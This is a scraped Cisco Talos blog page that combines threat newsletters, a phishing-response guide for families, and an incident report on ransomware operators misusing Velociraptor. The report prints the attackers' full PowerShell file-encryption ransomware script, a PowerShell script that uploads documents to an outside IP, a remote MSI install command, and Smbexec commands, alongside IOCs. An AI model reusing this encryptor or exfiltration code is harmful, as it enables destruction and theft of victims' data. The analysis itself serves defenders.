Martin muses on why computers are less fun than campfires, why their dangers seem less real, and why he’s embarking on a lengthy research project to study this.

Thursday, October 9, 2025 14:00

Harnessing fire is one of mankind’s earliest technological advances. A controlled, tame fire offers us warmth, light and succulent cooked food. Yet, allow the controlled fire to burn too fiercely and it risks becoming an uncontained fire. The unexpected smell of smoke or the sight of tall flames provokes a deep fear within us and demands an instant response to contain and extinguish the fire, or to flee from its path.

We instinctively understand the benefits and dangers of fire. Through bitter experience we’ve learnt how to design and operate buildings to minimise the risks and maximise the survivability of fire. These lessons have become coded in rules and legislation which are often actively enforced and result in heavy sanctions for those who break them even before there is any evidence of a fire occurring.

In comparison, computer systems are a very recent technology. There are clear benefits to networked computer systems, we have come to rely on them to conduct many of the day-to-day tasks in our personal and professional lives. Yet, the dangers of computers are intangible. You can’t smell a software vulnerability or feel the burning heat of an active breach. Somehow their ethereal nature feels less pressing than the risk of fire and may to lead to complacency in addressing cyber threats.

The question of why we continue to experience cyber breaches despite having the technical know how to prevent them is one that fascinates me. I’m intrigued by the differences in decision making processes that leads to cyber risk either being prioritised or deprioritised within organisations. Indeed, so much so that this week I’m commencing a part-time doctorate to research this issue.

Frequently, cyber intelligence concentrates on the here and now, providing vital information to defend systems in the immediate term or near future. Threat intelligence must be timely. After all, it is better to have 80% of the intelligence in time than 100% too late. Yet, this rapid drum beat of needing to respond quickly can detract from the longer-term strategic intelligence issues of how the threat landscape is evolving and how we can improve our threat detection and response capabilities.

As a part-time student I have eight years to try and get a grip on how decisions in cyber security are made, and what makes a good decision. I’ll be certain to share my findings to help improve things, but don’t hold your breath, it will not be a fast process.

**The one big thing**

Cisco Talos has been closely monitoring the abuse of cascading style sheets (CSS) properties to include irrelevant content (or salt) in different parts of messages, a technique known as hidden text salting.

**Why do I care?**

There is widespread use of hidden text salting in malicious emails to bypass detection. Attackers embed hidden salt in the preheader, header, attachments and body — using characters, paragraphs and comments — by manipulating text, visibility and sizing properties. Talos has observed that hidden content is far more often found in spam and other email threats than in legitimate emails, posing a substantial challenge to both basic and advanced email defense solutions that leverage machine learning.

**So now what? **

As explained with multiple examples, CSS provides a wide range of properties that can be abused by attackers to evade spam filters and detection engines. Therefore, two possible countermeasures are: first, to detect the presence of hidden text (or salt) in emails, and more importantly, to filter out the added salt before passing the message to downstream detection engines.

**Top security headlines of the week**

**Physics Nobel Awarded to Three Scientists for Quantum Computing Breakthroughs**  
The 2025 Nobel Prize in Physics was awarded to three scientists for foundational work enabling quantum error correction — a cornerstone for stable, scalable quantum computers that could eventually undermine today’s encryption systems. (BBC)

**Microsoft Defender Bug Triggers Erroneous BIOS Update Alerts**  
A bug in Microsoft Defender for Endpoint caused false vulnerability alerts related to Dell BIOS updates, leading to confusion among enterprise security teams. Microsoft confirmed the issue stems from a logic flaw in its vulnerability-fetching process. (Bleeping Computer)

**Federal Government Acknowledges End of MS-ISAC Support**  
The U.S. federal government confirmed it will end funding for the Multi-State Information Sharing and Analysis Center (MS-ISAC), a program with a 20-year track record of helping state and local governments coordinate cybersecurity efforts. Advocates warn its loss will significantly weaken local cyber defense collaboration. (GovTech)

**Can’t get enough Talos?**

**Footholds in Infrastructure: Defending Service Providers**  
Service providers sit at the heart of global connectivity... and the center of the threat landscape. In this short documentary, Cisco Talos explores the unique cybersecurity challenges faced by service providers.

**Velociraptor leveraged in ransomware attacks**  
Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.

**What to do when you click on a suspicious link**  
As the go-to cybersecurity expert for your friends and family, you’ll want to be ready for those “I clicked a suspicious link — now what?” messages. Share this quick guide to help them know exactly what to do next.

**Talos Takes: You can’t patch burnout**   
October is Cybersecurity Awareness Month, but what happens when the defenders themselves are overwhelmed? In this powerful episode, Hazel and Joe Marshall get real about why protecting your well-being is just as vital as any technical defense.

**Upcoming events where you can find Talos **

*   Wild West Hackin' Fest (Oct. 8 – 10) Deadwood, SD 
*   DEEP Conference (Oct. 22 – 23) Petrčane, Croatia 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a**  
MD5: 1f7e01a3355b52cbc92c908a61abf643  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a  
Example Filename: cleanup.bat  
Detection Name: W32.D933EC4AAF-90.SBX.TG

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe\_1\_Exe.exe  
Detection Name: Win.Worm.Coinminer::1201

**SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974**  
MD5: aac3165ece2959f39ff98334618d10d9  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974  
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe  
Detection Name: W32.Injector:Gen.21ie.1201

**SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe**  
MD5: bf9672ec85283fdf002d83662f0b08b7  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe  
Example Filename: f\_00db3a.html  
Detection Name: W32.C0AD494457-95.SBX.TG

**SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**  
MD5: 7bdbd180c081fa63ca94f9c22c457376  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe\_3\_Exe.exe  
Detection Name: Win.Dropper.Miner::95.sbx.tg

Why don’t we sit around this computer console and have a sing-along?

Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.  
We assess with moderate confidence that this activity can be attributed to threat actor Storm-2603, based on overlapping tools

Thursday, October 9, 2025 06:00

*   Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.  
*   We assess with moderate confidence that this activity can be attributed to threat actor Storm-2603, based on overlapping tools and tactics, techniques, and procedures (TTPs)  
*   Talos also observed evidence of Babuk ransomware files on the victim’s network, which has not been previously deployed by Storm-2603. 

In August 2025, Talos responded to a ransomware attack by actors who appeared to be affiliated with Warlock ransomware, based on their ransom note and use of Warlock’s data leak site (DLS). They deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines (VMs) and Windows servers. This severely impacted the customer’s IT environment. 

 Figure 1. Ransomware note. 

**Velociraptor **

Velociraptor is designed for security teams to use for endpoint monitoring by deploying client agents across Windows, Linux and Mac systems to continuously collect data and respond to security events. 

Velociraptor played a significant role in this campaign, ensuring the actors maintained stealthy persistent access while deploying LockBit and Babuk ransomware. After gaining initial access the actors installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (CVE-2025-6264) that could lead to arbitrary command execution and endpoint takeover. 

Threat actors have also reportedly leveraged Velociraptor to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command-and-control (C2) server.  

The addition of this tool in the ransomware playbook is in line with findings from Talos’ 2024 Year in Review, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products. 

Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell. 

Similar to the activity Talos observed in this engagement, Storm-2603 is known for deploying Warlock ransomware and Lockbit ransomware in the same engagement. While LockBit is widely deployed by a variety ransomware actors, Warlock was first advertised in June 2025 and has since been heavily used by Storm-2603. Additionally, it is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603. 

The threat actor in this engagement also mirrored several Storm-2603 TTPs, based on reporting by Microsoft: 

*   Use of cmd.exe and batch scripts 
*   Disabling Microsoft Defender protections 
*   Creating scheduled tasks 
*   Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies 
*   Modifying Group Policy Objects (GPOs) 

While Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization’s data, both their exposure to the ToolShell vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation.  

**Campaign overview **

The first high-confidence indications of suspicious activity associated with this campaign occurred in mid-August 2025, with attempts to escalate privileges and move laterally within the compromised environment. We observed the threat actor creating admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller. The same actor-controlled admin account also accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs), which could allow for persistent access to the virtual environment. 

Notably, the threat actor installed an older version of Velociraptor on multiple servers to maintain persistence using the following command. We observed Velociraptor launching several times even after the host was isolated. 

    msiexec  /q /i hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi 

The actors also executed the following command to run Smbexec, a Python script that comes with Impacket and allows an attacker to launch programs remotely using the SMB protocol: 

    %COMSPEC% /Q /c echo cd ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\TkTvjYUp.bat & %COMSPEC% /Q /c %SYSTEMROOT%\TkTvjYUp.bat & del %SYSTEMROOT%\TkTvjYUp.bat  
    C:\Windows\System32\cmd.exe cmd.exe /Q /c cmd /c c:\windows\temp\1.bat /y 1> \Windows\Temp\suLGnR 2>&1 

To impair defenses and evade detection, the actors modified Active Directory (AD) GPOs and: 

*   Enabled “turn off real-time protection,” which continuously monitors for potential threats such as viruses, malware and spyware 
*   Disabled “behavior monitoring,” which blocks suspicious activities by observing deviations from established patterns of normal behavior 
*   Disabled “monitor file and program activity on your computer,” which observes how software behaves to identify patterns associated with malicious activity 

The actors deployed a fileless Powershell script that had an encryption functionality, which we believe was the primary encryptor that deployed mass encryption on the Windows machines:  

    function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2/7/o4pMjgg4S838jw6aiRbag/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j/IMa6GNpMkVjsNPjvB/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB/M+bHFwgYkUG4rS2s/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"} 

After the script was deployed, Talos observed ransomware executables on Windows machines that were identified by EDR solutions as LockBit, and encrypted files with the Warlock extension “xlockxlock”. There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with “.babyk”. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting. 

The actors also conducted double extortion, exfiltrating data using the below PowerShell script. To evade detection, the exfiltration script shows that “$ProgressPreference” is set to “SilentlyContinue”, which suppresses any visual indication of the command’s progress. It also includes the “start-sleep” cmdlet, which suspends the script for a specified period of time. This cmdlet can be used to inhibit analysis, as many malware analysis tools, such as sandboxes, have a limited time window, and used to avoid triggering security alerts that might identify rapid, continuous script activity. 

    function GR {$numbers = 1..20;$numbers | Get-Random }  
    function Upfile { 
        param ( 
            [string]$path = "C:\Users\", 
            [int]$maxConcurrentJobs = 40  # 
        ) 
        Add-Type -AssemblyName System.Web 
        try { 
            $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |  
                    Where-Object { $_.Length -lt 50MB } |  
                    Select-Object -ExpandProperty FullName 
            $uploadScriptBlock = { 
                param ($file, $grValue) 
                try { 
                    Add-Type -AssemblyName System.Web 
                    $fileName = Split-Path -Path $file -Leaf 
                    $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName) 
                    $uploadUrl = "http[:]//65.38.121[.]226/test/$encodedFileName" 
                    Write-Host "upload $file to $uploadUrl" 
                    $ProgressPreference = 'SilentlyContinue' 
                    $maxRetries = 3;$retryCount = 0 
    while ($retryCount -lt $maxRetries) { 
                try { 
    $wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, "PUT", $file) | Out-Null 
                    Write-Host "upload Sucess $fileName" 
                    break 
    }  
    catch { 
                    $retryCount++ 
                    Write-Host "upload $fileName retry $retryCount error: $_" 
                    Start-Sleep -Seconds 2 
                    }  
                    finally {$wc.Dispose()}}}  
           catch  
                { 
                    Write-Host "upload $fileName error: $_" 
                } 
                finally {$wc.Dispose()} 
            
            } 
            $grValue = GR 
            $jobs = @() 
            foreach ($file in $files) { 
                while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100} 
                $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue 
            } 
            $jobs | Wait-Job | ForEach-Object { 
                Receive-Job -Job $_ -Keep 
                Remove-Job -Job $_ 
            } 
        } catch { 
            Write-Host "getfile error: $_" 
        } 
    } 
    $drives = @("C:\Users\", "D:\", "E:\", "F:\", "K:\") 
    foreach ($drive in $drives) { 
        if (Test-Path $drive) {Upfile -Path $drive   } 
        else {Write-Host "Drive $drive is not accessible." -ForegroundColor Yellow} 
    } 

**Mitigation recommendations **

Please see Talos’ Ransomware Primer for detailed recommendations on how to safeguard against ransomware threats. We also recommend referring to Talos’ blog on ToolShell for information on these vulnerabilities and how to patch them. Additionally, Rapid7 has published some recommendations on detecting velociraptor misuse.

**MITRE ATT&CK techniques **

Resource Development  

*   T1584.003 Compromise Infrastructure: Virtual Private Server 

Execution 

*   T1059.001 PowerShell 

Persistence  

*   T1136 Create Account 
*   T1505.006 Server Software Component: vSphere Installation Bundles 

Privilege Escalation  

*   T1098.007 Account Manipulation: Additional Local or Domain Groups 
*   T1098 Account Manipulation 

Defense Evasion  

*   T1556 Modify Authentication Process 
*   T1484.001 Domain or Tenant Policy Modification: Group Policy Modification 

Lateral Movement  

*   T1021.001 Remote Services: Remote Desktop Protocol 

Collection  

*   T1213 Data from Information Repositories 

Exfiltration 

*   T1041 Exfiltration Over C2 Channel 

Impact 

*   T1486 Data Encrypted for Impact 
*   T1657 Financial Theft 

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The following ClamAV cover this threat_:_    
Win.Ransomware.Warlock-10057029-0  

**IOCs **

IOCs for this research can also be found at our GitHub repository here.

_C2/exfiltration IP address:_   
65.38.\[121\]\[.\]226 

_Domain hosting malicious MSI:_   
stoaccinfoniqaveeambkp.blob.core.windows\[.\]net 

_Velociraptor C2 server_:   
velo.qaubctgg.workers\[.\]dev 

_Velociraptor:Legitimate tool used by the adversary for persistence_   
Velociraptor installer – 649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421   
Velociraptor.exe - 12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7   
Malicious Velociraptor config.yaml - A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023  

_Internal Monologue NTLM downgrade malware:_   
In.exe- C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A

Velociraptor leveraged in ransomware attacks

As the go-to cybersecurity expert for your friends and family, you’ll want to be ready for those “I clicked a suspicious link — now what?” messages. Share this quick guide to help them know exactly what to do next.

Wednesday, October 8, 2025 06:00

October is Cybersecurity Awareness Month, and as the tech-savvy friend or family member, people probably come to you for advice. One of the most common questions is: “I clicked a suspicious link. What do I do now?” 

Don’t worry — panic won’t help, but a calm, step-by-step response will. Share this guide with your loved ones so everyone knows exactly how to respond and stay safe. 

If you clicked the link on a work device, immediately contact IT support and follow their instructions. Companies often have specific policies and tools to investigate and remediate security incidents. Quick reporting helps protect both you and your organization. 

If it’s a personal device, **here’s what to do next.**

**Scenario 1: You only clicked the link, and did not enter any information **

Clicking a malicious link can trigger automatic downloads, attempt to exploit browser vulnerabilities, or install malware without your knowledge. 

*   Exit the browser immediately. 
*   Make sure no files downloaded to your device; if so, delete them without opening. 
*   Monitor your device for unusual behavior, which can be a sign of malware. 
    *   _**Examples:** Higher-than normal battery drainage, apps crashing, unknown apps/profiles, and persistent pop-ups_ 
*   Stay alert for suspicious emails, texts, or calls.

Together, these steps help you catch and remove any threats before they cause harm, and keep you aware of follow-up attacks.

**Scenario 2: You entered your username and password **

Entering credentials on a phishing site can give attackers access to your account, leading to unauthorized activity, identity theft or further phishing. 

*   Change your password **immediately** for that account, and force a logout of all devices logged in. This locks out any unauthorized users who may have gained access. 
*   If you have multifactor authentication (MFA) enabled, watch for any push notifications that you did not initiate. Do not approve them. This could mean someone is actively trying to log in with your stolen credentials. 
*   Enable two-factor authentication (2FA) if available. 
*   Create new, unique passwords for any other accounts that used the same credentials. Attackers often try your compromised password on multiple sites (aka called credential stuffing). 
    *   _**Tip:** Instead of storing your credentials in your browser, use a password manager such as 1Password._ 
*   Watch for suspicious account activity.

By following these steps, you limit the attacker’s access and protect your other accounts from being compromised. 

**Scenario 3: You entered credit card or banking information **

Financial data can be quickly exploited for fraudulent transactions, identity theft, or even sold on the dark web. 

*   Contact your bank or card issuer right away. 
*   If possible, freeze your card and get a replacement. 
*   Monitor your statements and report any unauthorized charges. 
*   Enable fraud alerts if your bank offers them.

These actions help you contain the risk, minimize financial losses, and alert your bank to potential fraud on your account.

**Scenario 4: You downloaded or opened a file **

Downloaded files from suspicious links can contain malware, ransomware, spyware or other harmful software that may steal your data or harm your device. 

*   Disconnect your device from the internet until you have completed all of these steps. Isolating your device can prevent malware from communicating with attackers or spreading to other devices. 
*   Run a full antivirus and malware scan if on a desktop or laptop. 
*   Check to ensure no new apps were installed if on a phone. 
*   Delete any suspicious files. 
*   In a worst-case scenario, if you have conducted periodic backups it might be best to restore your device to a clean version, from before the file was downloaded.

**Remember to: **

*   Always verify links before you click on them.  
    *   _Tip: Hover over the link to make sure it leads to an official website. If you’re not sure, it’s safer to type in the URL manually._ 
*   Enable multifactor authentication for your accounts whenever it’s available. 
*   Keep your software and antivirus updated. 
*   Report all phishing attempts to your email provider and IT/security team. 

Phishing attacks are getting more sophisticated, but a little knowledge goes a long way. Share this guide with your friends and family so they’ll know what to do if they ever click a suspicious link.

Happy Cybersecurity Awareness Month from Cisco Talos!

What to do when you click on a suspicious link

A simple yet effective tactic, known as hidden text salting, is increasingly used by cybercriminals over the past few months to evade even the most advanced email security solutions, including those powered by machine learning and large language models.

Too salty to handle: Exposing cases of CSS abuse for hidden text salting

Amy gives an homage to parents in family group chats everywhere who want their children to stay safe in this wild world.

Thursday, October 2, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter, and happy Cybersecurity Awareness Month.

Like everyone under the age of 35 who has at least one father, my dad sends me advice on online safety at least once a week. Does he work in information security? No. He’s a recently retired high school audio engineering teacher, who now spends his days touring with a yacht rock cover band and building guitars. But throughout his life, he’s been a true Renaissance man. From playing trombone on a Bruce Springsteen tour to building our backyard deck, to Roth IRA advice, to the history of Bell Labs, the breadth of his knowledge astounds me. I actually called him last week to find out just _how long_ I can drive my car before taking it to the mechanic to get the oxygen sensor fixed.

There is one area where I think I have him beat: cybersecurity. Not by a lot, but I think working in Talos has given me an edge — or, at least, access to people who can tell me how worried I should be about an issue that Facebook is having a field day with.

Still, that doesn’t stop him from sending me a steady stream of headlines and warnings. Here are just a few that my dad has sent me:

*   **Jan. 31, 2024:** An NBC news clip of former FBI Director Christopher Wray disclosing alarming hacking threats to critical U.S. infrastructure, also mentioning the takedown of Volt Typhoon. 
*   **Sept. 19, 2024:** An article explaining that if you’re shopping online and your credit card gets declined, you may be getting scammed. 
*   **May 1, 2025:** A video warning that “QR codes in mystery packages could steal your identity.” 
*   **June 22, 2025:** This video about hidden watermarks embedded in AI-generated content. Not nearly as menacing as the others (unless you're a college student trying to coast), but it _is_ fascinating. This article gives a deeper understanding. 

Even without deep investigation, these headlines reveal a lot about how cybersecurity anxieties are shared and amplified on social media. It’s a cycle that’s probably familiar to a lot of us: technology keeps evolving, but the impulse to protect each other never really changes. Whether you’re the IT help desk for your family or the one receiving those late-night warnings (or both), every message is a chance to share knowledge, calm fears, and help each other navigate a world that’s always shifting under our feet.

So, the next time your dad (or mom, or aunt, or grandma) sends you a link that sounds a little far-fetched, take a moment to appreciate the intent behind it. They might not always get the details right, but their concern is real. In its own way, that’s another layer of security.

Breathe in, let it out, and let’s dive in.

**The one big thing **

Cisco Talos has uncovered a Chinese-speaking cybercrime group, UAT-8099, that is hacking into reputable Internet Information Services (IIS) servers in countries like India, Thailand, Vietnam, Canada, and Brazil. Their main goals are to manipulate search results for profit and steal sensitive data, such as credentials and certificates, often using advanced tools and custom malware to avoid detection. The group maintains long-term access to these servers and protects their control from other attackers.

**Why do I care? **

Cybercriminals are evolving to target trusted infrastructure for both financial gain and deeper access to valuable data. The use of automation, custom malware, and persistence techniques in this campaign shows UAT-8099 can impact a wide range of organizations.

**So now what? **

Review your environments for signs of BadIIS malware, unauthorized web shells and suspicious RDP or VPN activity on IIS servers. Also, strengthen server defenses, monitor for unusual traffic and share indicators of compromise (IOCs) within the security community to help prevent further attacks.

**Top security headlines of the week **

**CISA 2015 cyber threat info-sharing law lapses amid government shutdown**   
Defenders have lost the information-sharing liability protection the bill provided, and the government has lost a lot of visibility into threats emerging across the private sector. (CSO) 

**Cyberattack on JLR prompts £1.5B UK government intervention**   
The announcement Sunday says that the support package is meant to “give certainty to its supply chain following a recent cyber-attack.” Some experts believe the bailout will encourage cybercriminals to continue targeting UK companies with weak cybersecurity. (Security Week) 

**Neon pays users to record their phone calls and sells data to AI firms**   
Unbelievably, this app was spotted in the No. 2 spot in Apple’s U.S. App Store’s Social Networking section. Their marketing claims to only record your side of the call unless it’s with another Neon user. (TechCrunch) 

**"Klopatra" trojan makes bank transfers while you sleep**   
A sophisticated new banking malware is hard to detect, capable of stealing lots of money, and infecting thousands of people in Italy and Spain, under the guise of a pirate streaming app. (Dark Reading) 

**Can’t get enough Talos? **

**Talos Takes: You can’t patch burnout**   
October is Cybersecurity Awareness Month, but what happens when the defenders themselves are overwhelmed? In this powerful episode, Hazel and Joe Marshall get real about why protecting your well-being is just as vital as any technical defense. 

**The TTP: Threat Hunter’s Cookbook**   
Hear from Ryan Fetterman and Sydney Marrone from the SURGe team (now part of Cisco’s Foundation AI group), who wrote the Threat Hunter’s Cookbook: a collection of practical “recipes” security teams can pick up and apply. 

**Engaging Cisco Talos Incident Response**    
You’ve called Talos IR about a cyber incident — now what happens? This blog post takes you behind the scenes of a Talos IR engagement, from picking up the phone to recovery and implementation of long-term security improvements.  

**Upcoming events where you can find Talos **

*   Wild West Hackin' Fest (Oct. 8 – 10) Deadwood, SD 
*   DEEP Conference (Oct. 22 – 23) Petrčane, Croatia 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a**    
MD5: 1f7e01a3355b52cbc92c908a61abf643    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a    
Example Filename:cleanup.bat    
Detection Name: W32.D933EC4AAF-90.SBX.TG 

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Example Filename:VID001.exe    
Detection Name: Win.Worm.Coinminer::1201 

**SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610**    
MD5: 85bbddc502f7b10871621fd460243fbc    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610    
Example Filename:85bbddc502f7b10871621fd460243fbc.exe   
Detection Name: W32.41F14D86BC-100.SBX.TG 

**SHA256: 3d8eeb6df4a2d777f18d0f15b19cd9666a78927013b8359c883bff423d9faaec**    
MD5: 5b7948e7ca9742a33be8403b3285a1aa    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=3d8eeb6df4a2d777f18d0f15b19cd9666a78927013b8359c883bff423d9faaec    
Example Filename:onestart.exe    
Detection Name: W32.3D8EEB6DF4-95.SBX.TG 

**SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe**    
MD5: bf9672ec85283fdf002d83662f0b08b7    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe    
Example Filename:f\_04b985.html    
Detection Name: W32.C0AD494457-95.SBX.TG

Family group chats: Your (very last) line of cyber defense

